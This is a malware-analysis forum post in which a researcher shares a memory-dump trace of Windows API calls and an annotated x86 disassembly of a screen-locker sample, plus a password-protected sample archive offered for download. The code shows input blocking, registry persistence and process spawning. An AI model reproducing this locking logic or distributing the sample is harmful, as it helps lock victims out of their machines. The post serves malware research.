A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #23817  by unixfreaxjp
 Mon Sep 08, 2014 8:09 pm
Had not enough time to analyze this deeper, shared what I got here. Pls help to break it down deeper.
VT: https://www.virustotal.com/en/file/f509 ... 410205927/
Image of three infection:
Memory dump :
Code: Select all
// hash: 8028ee3776ac68bb5789575e5a904465
// Locking timer Forensics.
// Env: WinVista | @unixfreaxjp - 20:53 Mon Sep  8 20:53:33 JST 2014

1. Window created   

   Window Name: +vgC>=_~!s_b0$>-TG)wIrh&8T*)Yg+t*5)Qwl%
   Siqr$_Z]gUEJ<~#%Lu(9[@Ix*(n_afsP^Q=k_AR5BgTeC *tfl%FT-e<
   ()HaZz^3&MEXw=l5xxNWAgW~*7wgPbZtOo3QJ]XI[ZCiZG<p Class N
   ame: +vgC>=_~!s_b0$>-TG)wIrh&8T*)Yg+t*5)Qwl%7zD{DVL3
   gUEJ<~#%Lu(9[@Ix*(n_afsP^Q=k_AR5BgTeC *tfl%FT-e<()HaZz^3
   HWND: 50116

2. Input blocked On or Off: true | Mem Dmp Addr: 0x0403105   NtUserBlockInput

3. Malicious activity Calls (Memory Dump))

    KillTimer.USER32 ref: 0x402EC3
    PostQuitMessage.USER32(00000000) ref: 0x402EDB
    DefWindowProcW.USER32 ref: 0x402EED
        Part of subcall function 0x40223C: RegCreateKeyExW.ADVAPI32(80000001,00000000,00000000,00000000,000F013F,00000000,00000000) ref: 0x40226E
        Part of subcall function 0x40223C: RegSetValueExW.ADVAPI32(00000000,00000004,00000004) ref: 0x4022A5
        Part of subcall function 0x40223C: RegSetValueExW.ADVAPI32(00000000,00000004,00000004) ref: 0x4022CA
        Part of subcall function 0x40223C: RegFlushKey.ADVAPI32 ref: 0x4022CF
        Part of subcall function 0x40223C: RegCloseKey.ADVAPI32 ref: 0x4022D8
    SetTimer.USER32(00000002,00000001,00000000) ref: 0x402F0F
        Part of subcall function 0x40532D: IsBadWritePtr.KERNEL32(00000000,00000000) ref: 0x405344
    SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,0x410AA8) ref: 0x402F3A
    lstrcatW.KERNEL32(0x410AA8) ref: 0x402F57
        Part of subcall function 0x405B82: inet_addr.WSOCK32(0x410AA8,0x402FBA) ref: 0x405B87
        Part of subcall function 0x405B82: gethostbyname.WSOCK32 ref: 0x405B98
        Part of subcall function 0x402B25: memset.NTDLL(00000000) ref: 0x402B4C
        Part of subcall function 0x402B25: GetVersionExW.KERNEL32 ref: 0x402B65
        Part of subcall function 0x402B25: GlobalMemoryStatusEx.KERNEL32 ref: 0x402B7D
        Part of subcall function 0x402B25: GetSystemInfo.KERNEL32 ref: 0x402B87
        Part of subcall function 0x402B25: GetCurrentProcess.KERNEL32 ref: 0x402BB8
        Part of subcall function 0x4053FE: PathSkipRootW.SHLWAPI ref: 0x40541D
        Part of subcall function 0x4053FE: GetFileAttributesW.KERNEL32 ref: 0x405445
        Part of subcall function 0x4053FE: CreateDirectoryW.KERNEL32(00000000) ref: 0x405453
        Part of subcall function 0x405EBA: lstrcpynA.KERNEL32(00000032,0x410AA8,00000000) ref: 0x405F14
    GetModuleHandleW.KERNEL32 ref: 0x403022
    GetModuleFileNameW.KERNEL32(00000104) ref: 0x403029
    GetFileAttributesW.KERNEL32(0x410AA8) ref: 0x403030
    SetFileAttributesW.KERNEL32(0x410AA8) ref: 0x40303B
        Part of subcall function 0x404A47: CreateFileW.KERNEL32(80000000,00000001,00000000,00000003,02000000,00000000) ref: 0x404A99
        Part of subcall function 0x404A47: GetFileTime.KERNEL32(0x401E0B) ref: 0x404AAF
        Part of subcall function 0x404A47: CreateFileW.KERNEL32(00000100,00000000,00000000,00000003,02000000,00000000) ref: 0x404ACA
        Part of subcall function 0x404A47: SetFileTime.KERNEL32(0x401E0B) ref: 0x404AE0
    memset.NTDLL(00000000) ref: 0x403069
    CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,01000000,00000000,00000000) ref: 0x4030C6
    BlockInput.USER32(00000001) ref: 0x4030FF
    ShowWindow.USER32(00000005) ref: 0x40310A
    BeginPaint.USER32 ref: 0x40311D
    GetClientRect.USER32 ref: 0x403135
    FillRect.USER32(00000006) ref: 0x403143
    SetBkMode.GDI32(00000001) ref: 0x40314C
    lstrlenW.KERNEL32 ref: 0x403188
    DrawTextW.USER32 ref: 0x403194
        Part of subcall function 0x40A2EF: GetLastError.KERNEL32(0x403C58) ref: 0x40A2FA
        Part of subcall function 0x40A2EF: HeapFree.KERNEL32(00000000,0x403C58) ref: 0x40A32B
        Part of subcall function 0x40A2EF: SetLastError.KERNEL32(0x403C58) ref: 0x40A332
        Part of subcall function 0x40349C: GetHandleInformation.KERNEL32(00000000) ref: 0x4034B2
        Part of subcall function 0x40349C: CloseHandle.KERNEL32 ref: 0x4034C3
    EndPage.GDI32 ref: 0x4031A5
        Part of subcall function 0x403763: GetCurrentProcessId.KERNEL32 ref: 0x40378D
        Part of subcall function 0x403763: GetCurrentProcessId.KERNEL32 ref: 0x4037A8
    lstrlenW.KERNEL32 ref: 0x4031D8
        Part of subcall function 0x4013F2: SetErrorMode.KERNEL32(00008000) ref: 0x401400
        Part of subcall function 0x4013F2: GetSystemWindowsDirectoryW.KERNEL32(00000104) ref: 0x401412
        Part of subcall function 0x4013F2: lstrcatW.KERNEL32 ref: 0x40143F
    SetTimer.USER32(00000001,00000000) ref: 0x403207

4. Malicious Activity Disassembly (Memory Dump)

0x402E8C   push ebp   
0x402E8D   mov ebp, esp   
0x402E8F   and esp, FFFFFFF8h   
0x402E92   mov eax, dword ptr [ebp+0Ch]   
0x402E95   sub esp, 00000274h   
0x402E9B   push ebx   
0x402E9C   push esi   
0x402E9D   xor ebx, ebx   
0x402E9F   dec eax   
0x402EA0   push edi   
0x402EA1   je 0x4031B0h   target: 0x4031B0
0x402EA7   dec eax   
0x402EA8   je 0x402EF5h   target: 0x402EF5
0x402EAA   sub eax, 0Dh   
0x402EAD   je 0x403115h   target: 0x403115
0x402EB3   dec eax   
0x402EB4   je 0x402EF5h   target: 0x402EF5
0x402EB6   sub eax, 00000103h   
0x402EBB   jne 0x402EE1h   target: 0x402EE1
0x402EBD   push dword ptr [ebp+10h]   
0x402EC0   push dword ptr [ebp+08h]   
0x402EC3   call dword ptr [0x40D200h]   KillTimer@USER32.DLL (Import, 2 Params)
0x402EC9   mov eax, dword ptr [ebp+10h]   
0x402ECC   sub eax, ebx   xref: 0x40308B
0x402ECE   je 0x4030FDh   target: 0x4030FD
0x402ED4   dec eax   
0x402ED5   je 0x402F00h   target: 0x402F00
0x402ED7   dec eax   
0x402ED8   jne 0x402EE1h   target: 0x402EE1
0x402EDA   push ebx   
0x402EDB   call dword ptr [0x40D22Ch]   PostQuitMessage@USER32.DLL (Import, 1 Params)
0x402EE1   push dword ptr [ebp+14h]   xref: 0x403127 0x4031AB 0x402EBB 0x403110 0x402F1C 0x402FF6 0x4030F8 0x402F80 0x402ED8
0x402EE4   push dword ptr [ebp+10h]   
0x402EE7   push dword ptr [ebp+0Ch]   
0x402EEA   push dword ptr [ebp+08h]   
0x402EED   call dword ptr [0x40D230h]   DefWindowProcW@USER32.DLL (Import, 4 Params)
0x402EF3   mov ebx, eax   ; <==== executed
0x402EF5   pop edi   xref: 0x402EA8 0x402EB4
0x402EF6   pop esi   
0x402EF7   mov eax, ebx   
0x402EF9   pop ebx   
0x402EFA   mov esp, ebp   
0x402EFC   pop ebp   
0x402EFD   retn 0010h   function end
0x402F00   call 0x40223Ch   xref: 0x402ED5 target: 0x40223C
0x402F05   push ebx   
0x402F06   xor edi, edi   
0x402F08   inc edi   
0x402F09   push edi   
0x402F0A   push 00000002h   
0x402F0C   push dword ptr [ebp+08h]   
0x402F0F   call dword ptr [0x40D1F0h]   SetTimer@USER32.DLL (Import, 4 Params)
0x402F15   call 0x402E34h   target: 0x402E34
0x402F1A   test al, al   
0x402F1C   je 0x402EE1h   target: 0x402EE1
0x402F1E   push 00000208h   
0x402F23   mov esi, 0x410AA8h   
0x402F28   push esi   
0x402F29   call 0x40532Dh   target: 0x40532D
0x402F2E   pop ecx   
0x402F2F   pop ecx   
0x402F30   test al, al   
0x402F32   je 0x402F40h   target: 0x402F40
0x402F34   push esi   
0x402F35   push ebx   
0x402F36   push ebx   
0x402F37   push 0000001Ah   
0x402F39   push ebx   
0x402F3A   call dword ptr [0x40D1B8h]   SHGetFolderPathW@SHELL32.DLL (Import, 5 Params)
0x402F40   push edi   xref: 0x402F32
0x402F41   push D2B37023h   
0x402F46   push 0000001Bh   
0x402F48   push 0x40DD2Ch   
0x402F4D   call 0x403763h   target: 0x403763
0x402F52   add esp, 10h   
0x402F55   push eax   
0x402F56   push esi   
0x402F57   call dword ptr [0x40D110h]   lstrcatW@KERNEL32.DLL (Import, 2 Params)
0x402F5D   call 0x401F83h   target: 0x401F83
0x402F62   test al, al   
0x402F64   je 0x402F85h   target: 0x402F85
0x402F66   lea edi, dword ptr [esp+10h]   
0x402F6A   mov dword ptr [esp+10h], ebx   
0x402F6E   mov byte ptr [esp+14h], 00000001h   
0x402F73   mov dword ptr [esp+18h], 0x402CD1h   
0x402F7B   call 0x405EBAh   target: 0x405EBA
0x402F80   jmp 0x402EE1h   target: 0x402EE1
0x402F85   push ebx   xref: 0x402F64
0x402F86   push 51A963ABh   
0x402F8B   push 00000002h   
0x402F8D   push 0x40DD48h   
0x402F92   call 0x403763h   target: 0x403763
0x402F97   push ebx   
0x402F98   push 349518EAh   
0x402F9D   push 0000000Fh   
0x402F9F   push 0x40DD4Ch   
0x402FA4   mov dword ptr [esp+4Ch], eax   
0x402FA8   call 0x403763h   target: 0x403763
0x402FAD   add esp, 20h   
0x402FB0   push dword ptr [esp+2Ch]   
0x402FB4   push eax   
0x402FB5   call 0x405B82h   target: 0x405B82
0x402FBA   pop ecx   
0x402FBB   push eax   
0x402FBC   call 0x402B25h   target: 0x402B25
0x402FC1   push esi   
0x402FC2   call 0x4053FEh   target: 0x4053FE
0x402FC7   add esp, 0Ch   
0x402FCA   push esi   
0x402FCB   call 0x4023C5h   target: 0x4023C5
0x402FD0   pop ecx   
0x402FD1   call 0x40295Ah   target: 0x40295A
0x402FD6   mov dword ptr [esp+10h], edi   
0x402FDA   lea edi, dword ptr [esp+10h]   
0x402FDE   mov byte ptr [esp+14h], 00000001h   
0x402FE3   mov dword ptr [esp+18h], 0x402CD1h   
0x402FEB   call 0x405EBAh   target: 0x405EBA
0x402FF0   cmp dword ptr [0x410CB4h], ebx0x00000000
0x402FF6   je 0x402EE1h   target: 0x402EE1
0x402FFC   call 0x401E15h   target: 0x401E15
0x403001   push 00000001h   
0x403003   push 2B7588E7h   
0x403008   push 0000000Ch   
0x40300A   push 0x40DD5Ch   
0x40300F   call 0x403763h   target: 0x403763
0x403014   add esp, 10h   
0x403017   push 00000104h   
0x40301C   lea ecx, dword ptr [esp+7Ch]   
0x403020   push ecx   
0x403021   push eax   
0x403022   call dword ptr [0x40D080h]   GetModuleHandleW@KERNEL32.DLL (Import, 1 Params)
0x403028   push eax   
0x403029   call dword ptr [0x40D108h]   GetModuleFileNameW@KERNEL32.DLL (Import, Unknown Params)
0x40302F   push esi   
0x403030   call dword ptr [0x40D07Ch]   GetFileAttributesW@KERNEL32.DLL (Import, 1 Params)
0x403036   or eax, 06h   
0x403039   push eax   
0x40303A   push esi   
0x40303B   call dword ptr [0x40D08Ch]   SetFileAttributesW@KERNEL32.DLL (Import, 2 Params)
0x403041   lea eax, dword ptr [esp+78h]   
0x403045   push esi   
0x403046   push eax   
0x403047   call 0x404A47h   target: 0x404A47
0x40304C   push dword ptr [0x410CB4h]   
0x403052   call 0x4023E6h   target: 0x4023E6
0x403057   add esp, 0Ch   
0x40305A   push esi   
0x40305B   call 0x4023A4h   target: 0x4023A4
0x403060   pop ecx   
0x403061   push 00000x40h   
0x403063   lea eax, dword ptr [esp+38h]   
0x403067   push ebx   
0x403068   push eax   
0x403069   call 0x40A4E2h   memset@NTDLL.DLL (Import, 2 Params) target: 0x40A4E2
0x40306E   add esp, 0Ch   
0x403071   mov dword ptr [esp+1Ch], ebx   
0x403075   xor eax, eax   
0x403077   lea edi, dword ptr [esp+20h]   
0x40307B   stosd    
0x40307C   push 00000001h   
0x40307E   push 9F12C8E3h   
0x403083   stosd    
0x403084   push 00000004h   
0x403086   push 0x40DD6Ch   
0x40308B   mov dword ptr [esp+40h], 00000044h   ASCII "D" (Chunk)
0x403093   stosd    
0x403094   call 0x403763h   target: 0x403763
0x403099   push dword ptr [0x410CB4h]   
0x40309F   push eax   
0x4030A0   lea eax, dword ptr [esp+24h]   
0x4030A4   push eax   
0x4030A5   call 0x40469Ch   target: 0x40469C
0x4030AA   add esp, 1Ch   
0x4030AD   lea eax, dword ptr [esp+1Ch]   
0x4030B1   push eax   
0x4030B2   lea eax, dword ptr [esp+34h]   
0x4030B6   push eax   
0x4030B7   push ebx   
0x4030B8   push ebx   
0x4030B9   push 01000000h   
0x4030BE   push ebx   
0x4030BF   push ebx   
0x4030C0   push ebx   
0x4030C1   push dword ptr [esp+2Ch]   
0x4030C5   push ebx   
0x4030C6   call dword ptr [0x40D05Ch]   CreateProcessW@KERNEL32.DLL (Import, 10 Params)
0x4030CC   test eax, eax   
0x4030CE   je 0x4030E2h   target: 0x4030E2
0x4030D0   mov esi, dword ptr [esp+20h]   
0x4030D4   call 0x40349Ch   target: 0x40349C
0x4030D9   mov esi, dword ptr [esp+1Ch]   
0x4030DD   call 0x40349Ch   target: 0x40349C
0x4030E2   push dword ptr [esp+0Ch]   xref: 0x4030CE
0x4030E6   call 0x40A2EFh   target: 0x40A2EF
0x4030EB   pop ecx   
0x4030EC   push dword ptr [0x410CB4h]   
0x4030F2   call 0x40A2EFh   target: 0x40A2EF
0x4030F7   pop ecx   
0x4030F8   jmp 0x402EE1h   target: 0x402EE1
0x4030FD   push 00000001h   xref: 0x402ECE
0x4030FF   call dword ptr [0x40D210h]   BlockInput@USER32.DLL (Import, 1 Params)
0x403105   push 00000005h   ; <==== executed
0x403107   push dword ptr [ebp+08h]   
0x40310A   call dword ptr [0x40D214h]   ShowWindow@USER32.DLL (Import, 2 Params)
0x403110   jmp 0x402EE1h   target: 0x402EE1 ; <==== executed
0x403115   lea eax, dword ptr [esp+30h]   xref: 0x402EAD
0x403119   push eax   
0x40311A   push dword ptr [ebp+08h]   
0x40311D   call dword ptr [0x40D208h]   BeginPaint@USER32.DLL (Import, 2 Params)
0x403123   mov esi, eax   
0x403125   cmp esi, ebx   
0x403127   je 0x402EE1h   target: 0x402EE1
0x40312D   lea eax, dword ptr [esp+1Ch]   
0x403131   push eax   
0x403132   push dword ptr [ebp+08h]   
0x403135   call dword ptr [0x40D204h]   GetClientRect@USER32.DLL (Import, 2 Params)
0x40313B   push 00000006h   
0x40313D   lea eax, dword ptr [esp+20h]   
0x403141   push eax   
0x403142   push esi   
0x403143   call dword ptr [0x40D1F8h]   FillRect@USER32.DLL (Import, 3 Params)
0x403149   push 00000001h   
0x40314B   push esi   
0x40314C   call dword ptr [0x40D048h]   SetBkMode@GDI32.DLL (Import, 2 Params)
0x403152   push 00000001h   
0x403154   push 8182F0FBh   
0x403159   push 00000056h   
0x40315B   push 0x40DD78h   
0x403160   call 0x403763h   target: 0x403763
0x403165   push dword ptr [0x410CB0h]   
0x40316B   push eax   
0x40316C   lea eax, dword ptr [esp+24h]   
0x403170   push eax   
0x403171   call 0x40469Ch   target: 0x40469C
0x403176   add esp, 1Ch   
0x403179   test eax, eax   
0x40317B   je 0x4031A4h   target: 0x4031A4
0x40317D   push 00000025h   
0x40317F   lea eax, dword ptr [esp+20h]   
0x403183   push eax   
0x403184   push dword ptr [esp+14h]   
0x403188   call dword ptr [0x40D0B8h]   lstrlenW@KERNEL32.DLL (Import, 1 Params)
0x40318E   push eax   
0x40318F   push dword ptr [esp+18h]   
0x403193   push esi   
0x403194   call dword ptr [0x40D1FCh]   DrawTextW@USER32.DLL (Import, 5 Params)
0x40319A   push dword ptr [esp+0Ch]   
0x40319E   call 0x40A2EFh   target: 0x40A2EF
0x4031A3   pop ecx   
0x4031A4   push esi   xref: 0x40317B
0x4031A5   call dword ptr [0x40D044h]   EndPage@GDI32.DLL (Import, 1 Params)
0x4031AB   jmp 0x402EE1h   target: 0x402EE1
0x4031B0   lea eax, dword ptr [esp+78h]   xref: 0x402EA1
0x4031B4   push eax   
0x4031B5   push 00000001h   
0x4031B7   push E17754ACh   
0x4031BC   push 0000000Fh   
0x4031BE   push 0x40DD1Ch   
0x4031C3   call 0x403763h   target: 0x403763
0x4031C8   add esp, 10h   
0x4031CB   push eax   
0x4031CC   call 0x4036EAh   target: 0x4036EA
0x4031D1   pop ecx   executed
0x4031D2   pop ecx   
0x4031D3   lea eax, dword ptr [esp+78h]   
0x4031D7   push eax   
0x4031D8   call dword ptr [0x40D0B8h]   lstrlenW@KERNEL32.DLL (Import, 1 Params)
0x4031DE   mov edi, eax   
0x4031E0   add edi, edi   
0x4031E2   lea eax, dword ptr [esp+78h]   
0x4031E6   call 0x405BC4h   target: 0x405BC4
0x4031EB   mov dword ptr [0x410CB0h], eax   
0x4031F0   call 0x4013F2h   target: 0x4013F2
0x4031F5   sub dword ptr [0x4109DCh], eax   executed
0x4031FB   push ebx   
0x4031FC   push 00000001h   
0x4031FE   push dword ptr [0x4109DCh]   
0x403204   push dword ptr [ebp+08h]   
0x403207   call dword ptr [0x40D1F0h]   SetTimer@USER32.DLL (Import, 4 Params)
0x40320D   jmp 0x402EF5h   swap point 
7z, pwd: infected
The bad actor was a known carder, ripped fellow crooks becoming in "wanted" status, and now doing this locker.

(285.18 KiB) Downloaded 94 times